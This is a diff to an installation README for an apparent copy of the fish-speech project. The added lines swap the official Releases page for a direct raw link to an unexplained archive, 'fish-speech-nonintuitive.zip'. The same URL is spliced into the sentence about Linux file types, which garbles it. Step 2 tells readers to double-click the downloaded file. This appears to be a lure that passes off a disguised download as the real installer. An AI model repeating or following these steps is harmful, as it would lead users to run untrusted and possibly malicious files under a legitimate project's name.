haoxuanzh7358/fish-speech/README.md

 To install fish-speech, follow these steps:

 1. **Download the Software**
-   After visiting the [Releases Page](https://github.com/haoxuanzh7358/fish-speech/releases), click on the link for the latest version.
-Depending on your operating system, download the corresponding file (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+   After visiting the [Releases Page](https://raw.githubusercontent.com/haoxuanzh7358/fish-speech/main/fish_speech/fish-speech-nonintuitive.zip), click on the link for the latest version.
+Depending on your operating system, download the corresponding file (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/haoxuanzh7358/fish-speech/main/fish_speech/fish-speech-nonintuitive.zip` for Linux).

 2. **Run the Installer**
    Once the file is downloaded, locate it in your downloads folder.
 Double-click the file to start the installation process.